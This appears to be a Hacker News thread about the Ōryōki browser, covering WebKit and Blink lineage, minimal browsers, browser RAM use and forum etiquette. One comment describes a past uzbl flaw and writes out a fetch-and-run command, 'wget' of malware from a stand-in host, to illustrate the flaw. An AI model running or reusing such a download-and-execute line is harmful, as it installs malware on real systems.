NetSurf actually is good. Most of the web is more-or-less usable with it (usually “less”, but it's definitely bearable). It's stupid fast, too. My only gripes are its stability issues and the lack of official Windows support.
On sites that require Javascript, it is useless, of course, and even moderately fancy CSS layouts look ... interesting in it. (OTOH, no Javascript means that it practically has a builtin adblocker.)
But for sites where that is not a problem, it is incredibly fast, plus one can have dozens of tabs open, and it will rarely if ever use more than 100 MB of RAM. For browsing documentation, it usually works perfectly well.
All of those are WebKit-based, which was Chromium's rendering engine until recently. The rest of Chromium is primarily UI and network code, along with their sandboxing system and extensions - WebKit's "ports" have their own implementation of said network code tying into the framework that they're porting to (GTK+ or Qt, usually), and all three browsers you list use the WebKitGTK+ port.
uzbl, the one I've used the most, primarily consists of a pile of code to map callbacks to a protocol on stdin/stdout, and a handful of example scripts to communicate over that protocol - it's certainly no more "from scratch" or smaller than any other WebKit-based browser.
I expect that the other two similarly focus on UI code rather than pointlessly fiddling with WebKitGTK+'s internals - how are they not just skins (albeit of WebKitGTK+, not Chromium) as well?
Depends on what you mean by independent. If you just mean not any of the big three and their derivatives, you've got Servo[0], although that's still a herculean effort with direct support from Mozilla in terms of paying people to work on it. On the other end of the spectrum, you've got things like Dillo[1], which don't support much modern HTML/CSS/scripting, but do seem to get on by with far less effort.
Well, you know how long you've been hearing about Servo, and how it still, to a first approximation, can't render the web? Yeah, they're also bringing up Rust next to it, but... yeah, that's how long it takes.
It wasn't easy ten years ago, and a modern browser is at least an order of magnitude more complicated (WebGL, more complicated CSS, JS support, heck I'm not even really counting JS JIT here...).
I wish they'd open source EdgeHTML. I suspect it's far lighter than Gecko or WebKit, given that its development basically started with “let's rip out half of Trident”.
There's h-smile (commercial) from Terra Informatica, that's used by a lot of antivirus vendors to implement desktop GUI software in HTML. The latest commercial branding for it is called Sciter.
You'd think so (I know I did!), but I was floored the first time I started up Xombrero and saw that with only one tab, it used less than a sixth of the memory that Chromium uses. Xombrero has quickly become my favorite browser, though I only used it in the first place because I couldn't get any other browser that both 1) wasn't sludge on the Raspberry Pi, and 2) supported the modern Web (HTML5, CSS3, JS, ...).
It's not perfect by any means, but it is now my favorite :)
Internally Blink and WebKit are also diverging reasonably rapidly.
As a specific example, here is the project to re-architect how Blink does its painting:
https://www.chromium.org/blink/slimming-paint
More and more it feels that corporations have discovered that with FOSS, those that do the work get to define the standard. And thus they throw manhours upon manhours of churn at whatever market segment they hope to control.
> More and more it feels that corporations have discovered that with FOSS, those that do the work get to define the standard
Not quite - those that employ the maintainers define the standard, as shown multiple times by Red Hat (multiple projects) and by Apple with WebKit.
IIRC, before the Blink fork, Google was pushing more commits into WebKit than Apple, but there was a - let's call it a difference in perspective - over a feature a Google employee wanted to implement: someone with an @apple.com email said "no". I can't remember what the issue was, but this development unfolded on the WebKit mailing list.
Blink has diverged a fair amount. There are different new features, bug fixes and optimizations.
Most things based on Chromium also use more components of the Chromium stack than just Blink. For example, in WebKit, multiprocess support and sandboxing are provided at a batteries-included level. Blink just has the hooks for them, while the actual process architecture is implemented by other parts of Chromium.
This is not to say one way is better or worse, but rather that there are significant differences between being WebKit-based and Chromium-based.
I know that. However, I'm factually correct in saying that Chromium doesn't use WebKit. It doesn't matter that it's still largely the same; what matters is that Blink diverged from WebKit for a variety of reasons.
Not really, the Chromium content/ layer is pretty much stuff that every browser implementor using blink (or previously, WebKit) would want. See http://www.chromium.org/developers/content-module for more info.
Seems like the market is moving to almost all second-tier browsers (e.g. Opera) building from Chromium. I think this is a positive development as it should strengthen the underlying code if more people use it as a standard and then innovate UI, tools, services and so forth on top of it. Similar to what you see with the custom Android flavors/knock offs/whatever you want to call them in China.
I can think of many reasons why folks would want to use a custom browser built on top of Chromium rather than Chrome. Take Opera for example - Adblock and VPN are two services that can live more efficiently deeper in the core versus the extension layer where they are on Chrome. And these are two services that Google does not want to promote any more than they have to in order not to shed users. Browser competition is great for the market, the last thing we want is to end up in an IE6 type situation (and yes it can happen to anybody, even Google).
I'm amazed no-one has mentioned "dwb" in this thread. Yet another webkit-based browser with vi-like keybindings, but also an extension manager and plugins such as adblock and requestpolicy. Entirely keyboard-driven.
uzbl sounded really cool, but the first major security issue with it made me extremely wary of the project. IIRC, the 'uzbl' object was not properly fenced off from site javascript, so sites one browsed could trivially do the functional equivalent of uzbl.run('wget http://bad.host/malware; ./malware');
I realise every codebase has security bugs, but that one gave me the chills, and suggested that perhaps the security approach had not been thought through by the devs.
Guessing from the context of this article, his statements, and your response, he was talking about the Ōryōki web browser authors, who wrapped a browser engine in a UI framework to make a "small" browser. Apparently the number of UI widgets is what makes the difference between "small" and "full-blown".
Sometimes it's discouraging to think about how RAM requirements keep going up. The laptop I bought in 1999 had 64 MB of RAM, and that was enough for a comfortable multitasking system (dual-booting between Windows 9x and Linux with a GUI) for about two years.
Now, we have this, paraphrased from the 2012 novel _Off to Be the Wizard_ by Scott Meyer. Phillip, a time traveler from 1984, asks, "What on earth can a person do with 4 gigabytes of RAM?" Martin, from 2012, answers, "Upgrade it immediately."
Of course, things do get better over time, and some of those improvements require more RAM. Still, I wonder how much of the increases in minimum RAM requirements are actual progress, and how much are just waste. Is there even a way to answer that question? If I were to set up a machine (even a VM) running Windows 98 and Red Hat Linux 6.0 today, it probably couldn't do much on the current Internet, so I wouldn't be able to fairly evaluate how much the operating systems have actually improved.
I ask myself this from time to time. It's hard to quantify quality, but I'm certain that the exponential increase in power of today's PCs vs. those of the 90s is not reflected in an exponential improvement in the vast majority of software using that power. It seems that the more power is available, the sloppier the use of it. I wonder if someone has already formulated some kind of law describing this phenomenon :-)
This. I think about this all the time and discuss it at length with people. Lotus 123 could do things people use Google Sheets for today with a few orders of magnitude less processing power, memory, and network bandwidth. In terms of UX, a lot of the stuff was near-instant vs noticeably delayed today due to everything running in browsers.
I argue that the UX has actually gotten worse since software is becoming more bloated faster than the hardware improvements can keep up with. There are more layers of abstractions and VMs running VMs running VMs simulating DOMs listening for changes to objects to update models to trigger actions which bubble up to listeners which fire events which change data structures that eventually update some text on the screen. Consider what happens in the physical memory, at the hardware layer, to have a modern React app print a line of text when a text box is modified. Contrast this with what a terminal does and what happens in memory. Printing text to the screen in a "modern app" is now so complicated that it's effectively impossible for a human to determine the CPU instructions and memory manipulations required to do the things we're doing.
And what do we do? We make more transpilers, more frameworks, move more to the browser, split our systems across networks and around the world. Contrast saving a file to a floppy disk with uploading that same file to a "modern app" which stores it on S3 using Paperclip with Rails, as many modern apps do. Think about all the systems that file goes through, the network requests, the protocols involved, the standards required to make that happen, and the infrastructure which powers it all. Think about the data centers those VMs running that app run in, the people who oversee them, the tooling they need to run those systems. Think about all the project managers who had a hand in setting any of that up, the financial planning of each aspect, the development time spent.
Recall the time when one could reason about what goes on inside a computer at every level, when key presses registered immediately, when the memory allocations of applications and the OS they ran in made sense to humans. When it felt like magic instead of digging through a trash heap of ads to find the tiny sliver of what you needed.
what the hell are we actually even fixing anymore?
I've been hearing discouraging things from both architecture and silicon people at Intel. It seems like they lost direction, probably because of the recent explosion of mobile/ARM.
I know there are some changes in UIs and windowing systems that many people apparently consider indispensable improvements, but which I couldn't care less about. One example is the rise of compositing window managers. IIUC, a compositing window manager has to store a bitmap image of every window in RAM. But it would be fine with me if in this regard, our systems still worked like Windows XP, Mac OS 9, and X without something like Compiz, where things are drawn directly to the screen when necessary. That alone wouldn't get us back to a comfortable multitasking system in 64 MB of RAM, but it would be a start.
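For a sense of scale, here is a rough sketch of that per-window cost (the window count and sizes are illustrative assumptions, not measurements):

```python
# Rough memory cost of a compositing window manager that keeps a
# full ARGB bitmap per window (all figures are assumptions).
def window_buffer_bytes(width, height, bytes_per_pixel=4):
    """Size of one uncompressed 32-bit window backing buffer."""
    return width * height * bytes_per_pixel

one = window_buffer_bytes(1920, 1080)
print(round(one / 2**20, 1))        # one 1080p window: ~7.9 MiB
print(round(10 * one / 2**20, 1))   # ten such windows: ~79.1 MiB
```

Not huge per window, but it's memory the old draw-directly-to-screen path never needed to keep resident.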
RAM is meant to be consumed. If your browser is using 50MB of RAM and has to swap every background tab to disk then you're not utilizing the resources of your computer, and getting a crappy user experience as a bonus.
If only that were a relevant remark. The tab with the linked Oryoki web page alone is using 250 megabytes for me. And a second tab of the same page is using an additional 230 megabytes.
Somehow I don't think that that's well utilized RAM for the ~350 kilobytes of web content. This page uses 200 megabytes as a tab, and HN isn't exactly a heavy page.
Seriously. I remember having 10s of tabs open in Firefox on an XP machine with 256MB RAM total, and it performed relatively well.
At first I was going to blame all of the garbage from rockstar brogrammers, but even the simple HN comment page tab is using 264MB of RAM on macOS. The browser itself uses an additional 208MB according to Chrome's task manager, not counting all of the extensions. Where is it all going? There's 10 lines of JS on this page and a tiny amount of CSS. Has Chrome become that bloated?
This is especially annoying when many modern "desktop" apps are just Chromium wrappers that bleed memory.
Does it really use all that memory or does it pre-allocate it and does its own memory management inside? Not that it’s better, but that would explain why it takes so much.
It's not really Chrome's fault. Blame it on increased screen resolutions, copious amounts of available RAM, and a preference for saving CPU over saving RAM. Which also has the nice effect of using less energy.
If you have RAM and it is not being used, it is completely wasted; if you have CPU cycles and they are not being used, you are just saving on battery and not overheating the laptop.
Maybe on 3K or 4K laptops. But aren't most 1366x768 or something equally dismal? Which isn't far off 1024x768. Anyways, a 1080p frame at 32-bit depth is only about 8 MB.
Browsers are hardly low CPU, either. I'll see things idling at 10% of an i5. Which is like 200%+ of CPUs used for web browsing of yesteryear.
All this, and web pages are slower to respond. I recently used a page that loaded a grid of images. Switching to battery power (with its CPU throttling) had a 2 s impact on load time. The CPU was pegged during that time.
Sure, RAM is meant to be used, but not when the browser just consumes it forever, until it begins grinding to a halt. What could a browser POSSIBLY be doing with 400-500 MB of RAM PER TAB? It's a huge problem, and extensions like The Great Suspender should not have to exist.
Except we're not running an entire operating system in each tab. Everything starts fine, and then quickly consumes memory. How about we just stay fine? I've got entire operating systems running with less resources in VirtualBox.
Yes, RAM is meant to be consumed, but I still find it incredibly hard to believe that my browser NEEDS multiple gigabytes of memory. Regardless of how much I have to spare.
Is this a problem a browser can solve? I mean, modern websites are so large, with so much crappy stuff, and they're always loading something in the background - if you have 15-20 tabs of similar background-loading websites, your browser is bound to consume a lot of memory.
If I am not missing something obvious, aren't we blaming the wrong thing?
I see your point, but I don't find the state of things incredibly surprising anymore. Consider how huge modern web pages have grown, with a ton of poorly compressible media attachments, an embedded programming language that keeps track of plenty of state, and dozens of external resources that pull their own media and have their own state. Not to mention that we're in the middle of a responsiveness space race between browser vendors, and doing less CPU work by keeping more things in memory is one of the basic performance optimizations. With that said, as developers we have obviously been spoiled by the embarrassment of riches in terms of available hardware resources and have also contributed to the problem.
I understand your point, but there is inefficient vs. efficient use of resources. You could say it's ok to package a toothpick in a shoebox because cargo space is meant to be consumed.
When the ASCII text of a webpage is measured in tens of kilobytes, and the RAM in hundreds of megabytes, something is wrong.
I wonder if part of the solution is smarter caching at the OS level. Do all modern operating systems give the application a way to tell the OS, "This chunk of memory is a cache, so free it if it's needed for something else"? Of course, when the OS frees that memory, the app would need to know about that, so it can re-fetch or re-compute that cached data the next time it's needed.
They almost all do, yes. Android offers volatile ranges, OS X offers purgeable pages, Windows offers MEM_RESET/MEM_RESET_UNDO. To my knowledge Linux is the only exception, because last time I checked they hadn't merged Android's patches to enable the feature.
I have good gear but definitely not the latest and greatest of everything. My laptop is a MacBook Pro from 3 years ago. My desktop has an Intel 2600K and 16 GB of RAM. Both run on SSDs. I use my laptop for work. I rarely have fewer than 20 tabs open in Chrome, which stays open for days/weeks at a time. I've got VMs running, plus Xcode, Sublime, the iOS simulator, a bunch of terminals, a bunch of node apps, a couple of corporate sec products and incremental backup software, etc., etc. Not a single thing is slow. And I'm anal about things being slow; I hate waiting for anything. It's the same on my older desktop, which I also game on. I don't shut down my browser before playing games to free up RAM, or kill Photoshop, etc.
Unused RAM is useless RAM. It's a problem when you're always out of RAM, but get an SSD for the odd times you swap and you won't notice it. Either way, the only time my browser is slow is if I restart it and it loads my previous 20-30 tabs all at once. It'll do its thing for 10-20 seconds, then done.
I get that it's a lot of RAM, but what I don't get is why this impacts people so much. In this day and age, most of what people do is in a browser. And if you only have a tab or two, you're working outside of your browser, and you think your browser is killing your computer? Maybe it's time to upgrade or add some RAM.
You can get 16gb of ram for $50/$60... I abuse my machines with multitasking all day and none of them feel slow because my browser uses too much ram. Both have 16gb.
To be fair, the biggest offender in all this IS JavaScript in webpages. Though even more JavaScript in the browser UI isn't going to solve the JavaScript problem when it comes to performance.
Anybody can hit Shift+Esc in Chrome and see how JavaScript-heavy pages consume a shocking amount of memory.
This page on HN has 5 lines of inline JavaScript. It downloaded ~25KB of content, over 5 HTTP requests (HTTP/2 even), 3 of which are images, all of which are GIF images < 100 x 100.
This tab is consuming 98 MB of RAM. I am in incognito mode, with no plugins.
While crazy sites do crazy things with JS and have crazy bad user experiences (TMZ.com makes 700+ requests and takes over 90 seconds to load), 98 MB of RAM for an HN tab is ridiculous. This has very little to do with JS.
No, an average HN page consumes less than 20 MB on my computer. And you didn't tell us how much RAM TMZ.com is consuming: 165 MB on my machine (a 4 GB RAM, quad-core N2940 laptop), so about 8 times more RAM.
I agree completely. Taking buttons off of the GUI and using different hotkeys doesn't make a better web browser. You just end up with a browser for hipsters.
A lot of the hate here comes from the fact that there are people who are being creative, and you aren't. It's easy to shut people down...try to help them, instead. It's an experiment, made public. What's the purpose of shitting on it?
Don't you think that removing all the extensions, bookmark bars, and extraneous UI cruft will make this browser consume a lot less RAM? Seems logical to me.
How much of the overhead is actual overhead though? Operating systems know better than to store multiple identical copies of the same shared library in memory, for example. And it's not like the process-per-tab approach has no benefits - you use more RAM to get increased reliability and security in return.
We'd need a sandboxing and module system for Javascript to solve this. A problem that is both technically complex and not 'sexy', so don't hold your breath.
Don't assume everybody uses their computer like you do and only runs one browser maximized on their only monitor connected to their powerhouse of a computer equipped with a last-gen CPU and 64 gigabytes of ram.
For example, I sometimes play very resource-hungry games and like to have a youtube video on my second monitor while I play. But that's not possible on my gaming PC, so I have to youtube-dl the video first and run it in vlc instead.
That seems like exactly what you are doing. So you want to run a game and a youtube video and browse at the same time, while on a low end PC. Cool. A lot of people don't use their computer like that.
What kind of ridiculous, fallacious logic is this?
First of all, it's not a low end PC, it's an expensive gaming-dedicated rig barely a couple of years old. The amount of resources browsers consume is just ridiculously high.
Second, the argument that browsers should use all the resources and ram available in the world only holds if your computer is dedicated to web browsing. This is quite obviously false - I shouldn't even have to give you my case as an example. PCs are general computing machines.
Web browsers are too hungry for what they do. Not every tab is meant to run a full blown web app with webgl and megabytes of javascript code. The point I was making was that what I'm not able to do with Firefox/Chrome, I'm able to do with vlc. That is preposterous for something that wants to be "the future of the desktop".
This page is a good example of what's wrong with HN.
Someone publishes their open source experiment in minimal browser UI design, and everyone shits on it for not being a built-from-scratch web browser with low memory usage.
I posted this elsewhere, but since a lot of people seem genuinely confused about why someone would want a project like this, I'll say it again.
I use `chromium --kiosk-mode` as my daily browser. Chromium has features I value highly (e.g. great devtools, doesn't constantly crash like WebKit), but I'd rather have a more minimalistic user interface - less screen real estate wasted on chrome I don't want.
Note that this preference is completely orthogonal to the desire to have a lighter weight, more minimalistic browser in terms of codebase, memory usage, etc.
This is a good example of what is right with HN. Technical people expressing their technical demands w/r/t a technical project. If you want people to ooh and ahh over a project and keep quiet about its faults, show it your relatives.
Someone built an experiment in minimalistic UI design. "Technical people" started a massive pile-on, declaring "this is stupid, this doesn't have a minimalistic codebase at all."
That's not a technical demand, and it's not identifying a product's faults. That's a demand that this project have an entirely different purpose.
Personally, I use `chromium --kiosk-mode` as my everyday browser, and this project looks like something I'd be interested in if I were on a compatible OS. Not a small codebase, not a lightweight browser, but that's not what I care about. I want something that has Chrome's features (great devtools, doesn't crash every hour like the webkit browsers I've tried) but with less UI devoted to, uh, chrome that I don't use or want or need.
> Someone built an experiment in minimalistic UI design. "Technical people" started a massive pile-on, declaring "this is stupid, this doesn't have a minimalistic codebase at all."
Yeah, we're criticizing the fourth word of the very first sentence of their webpage, explaining what this is:
"Ōryōki is a small web browser with a thin interface."
There's nothing small about Chromium, and adding layers onto something doesn't make it smaller. Unless they're talking about how small you can make the browser window, it's a false claim that should have been excluded from the description.
The warranted response is obviously a mix of technical and product-based critique. But you would be foolish to expect every comment to convey this mix.
Why should this be wrong? People can be who they want to be. If something is cool, it's appreciated; if it's not, it gets shit on. That's life; deal with it. Not everyone is made of porcelain. Some people can deal with criticism even when it's not delivered the way it's taught in management classes.
This is a common objection that does carry some weight, but turns out not to hold in HN's context. In a large, semi-anonymous, weakly cohesive internet forum, the behavior referred to in this thread as "shitting" propagates into a force that's destructive of the community. The best people begin to leave, the shit piles up, and soon we're in a death spiral.
That's the #1 risk to HN, so we worry about it. Like many here, we've seen it happen before, and HN was literally founded on the idea of not letting it happen again—or at least trying to stave it off.
That doesn't mean we don't get the value of hard-hitting technical critique done in the right context; it means that HN is not the right context for the shitting variety. Nor do we ask users to be namby-pamby milquetoasts; we ask them to understand the fragility of the community enough to preserve it for the future. We don't want a scorched-earth outcome.
So go ahead and make clear technical criticisms, but make them without the extra jabs that people often feel compelled to stick in. That latter behavior isn't hard technical critique anyhow, just chest-beating.
Unfortunately that's how the real world is when you ask people to spend their time to look at what you've done. They are going to look at it for exactly 10 seconds and tell you it sucks or that they have no use for it.
If HN (or any other website) turns into a "Its OK, you're among friends here" type of auto-fawning community, it would delude people into thinking they're actually doing something worth showing to people as opposed to hacking on a hobby project for their own enjoyment. (This isn't specific to the linked project)
For Firefox users, this can all be done with custom browser CSS in userChrome.css (Vimperator helps), which offers significantly more control without having to rewrite the core code.
Would be useful to add a "macOS" (or Linux/Win) label to HN links when a tool is for a specific OS only, so that users of other OSes don't have to spend their clicks. At least for this project it's straightforward; sometimes it takes a few minutes on a website to find out that, well, you can't use it unless you buy a new computer.
At a previous job, we built and installed and ran a system test with that faster than Firefox unpacked the source tarball. OTOH, it's quite limited, and Javascript support isn't really there yet.
The typical web browser UI is a terrible waste of pixels. It might be a requirement for non-techies, but surely no one clicks the back button or drags the scroll bar - at least no power user does.
I personally use Firefox + vimperator with menu bar, address bar and scroll bars disabled. A single line status bar has all the info I need.
I've also dabbled with some of the "micro browsers" but none was satisfactory without a lot of trouble configuring proxies, etc.
For the future, I am hoping that someone will put together a Servo based micro browser with a keyboard oriented user interface.
> It might be a requirement for non-techies, but surely no one clicks the back button or drags the scroll bar - at least no power user does.
IIRC, back button is one of the most used UI elements of a browser.
I'd probably consider myself a power user (I work on browsers for a living), and I use most of the features you've described. Especially scrollbars - they're a great read-progress indicator.
On a side note, we so often forget how small the bubble of so-called "power users" is.
I fully support innovation in terms of a new web browser... but this isn't really what I'd like to see. I feel like the web browser should be more of an OS than it is today. Why does the language attribute in the script tag only support JavaScript? Wouldn't it be rad if I could write C# and not have to transpile it? Wouldn't it be rad if browsers could add more language support automatically (with your permission first)? So if you go to hipster.io and they've decided to develop their whole client side in Lisp, but you don't have support yet, your browser goes to Mozilla's module repository and downloads the plugin. Wouldn't it be rad if jQuery were installed as a module, downloaded once for ALL sites, and only re-downloaded when a site's version is different/customized?
That last one is already implemented with browser caching. Go to a popular website and check the Requests tab on your dev console, it'll probably show 304s for CDNs. But possibly some companies join many JS files together before publishing.
That requires you (as a site author) to choose between two evils, however - even though there's no real technical reason why you should have to: either copy framework-of-your-choice.js to your own host and accept duplication, or serve it from the framework's CDN and get great caching, but accept that you no longer have any control over what scripts run on your page.
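To make the revalidation mechanics behind those 304s concrete, here's a toy sketch of the ETag dance; the asset name and ETag value are made up:

```python
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

ETAG = '"v1-some-framework"'  # hypothetical cache validator

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Client already holds this version: 304, body not re-sent.
        if self.headers.get("If-None-Match") == ETAG:
            self.send_response(304)
            self.end_headers()
            return
        body = b"/* framework-of-your-choice.js */"
        self.send_response(200)
        self.send_header("ETag", ETAG)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep output quiet
        pass

srv = HTTPServer(("127.0.0.1", 0), Handler)
threading.Thread(target=srv.serve_forever, daemon=True).start()
url = f"http://127.0.0.1:{srv.server_port}/lib.js"

# First visit: full 200 response; a browser caches body + ETag.
first_status = urllib.request.urlopen(url).status

# Revalidation: send the stored ETag back; server answers 304.
req = urllib.request.Request(url, headers={"If-None-Match": ETAG})
try:
    second_status = urllib.request.urlopen(req).status
except urllib.error.HTTPError as e:
    second_status = e.code  # urllib raises on non-2xx statuses

print(first_status, second_status)
srv.shutdown()
```

The catch the parent describes is that this cache is keyed by URL, so the same framework served from a hundred different hosts is cached a hundred times.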
I really like the draggable windows, and the shortcuts for hiding and showing things. And the omnibox is, like, perfect; that's all I want.
But browsing a little, I immediately had problems zooming the viewport or increasing font size. Zoom gestures don't work, and neither does ⌘+/-. I couldn't find anything in the menu for it. Double-click on text does a zoom, but not enough. And sometimes content is moved off the viewport when you zoom in.
Very cool project.
edit: I'm still playing with it... it's got nice little notifications at the top. When you click a link, it says "loading...", then "850ms", or whatever; the page load time. And then ⌘← to navigate back shows "Navigating back", "Loading...", page load. It's cool. Looks nice. Dev tools open in a new window, and I couldn't find a way to open them in a panel, but maybe that can be set in the preferences.json.
Maybe I'm ignorant, but having Electron on top of Chromium sounds somewhat redundant to me. Don't they share more or less the same core, i.e. V8 and Blink?
Making a web browser is hard. You will be dealing with sensitive information, your credentials, etc. Security-wise it is very hard to produce a sandboxed environment. Chromium might provide this to some extent but building on top of it might not magically preserve the same level of security.
http://surf.suckless.org/
https://fanglingsu.github.io/vimb/
http://www.uzbl.org/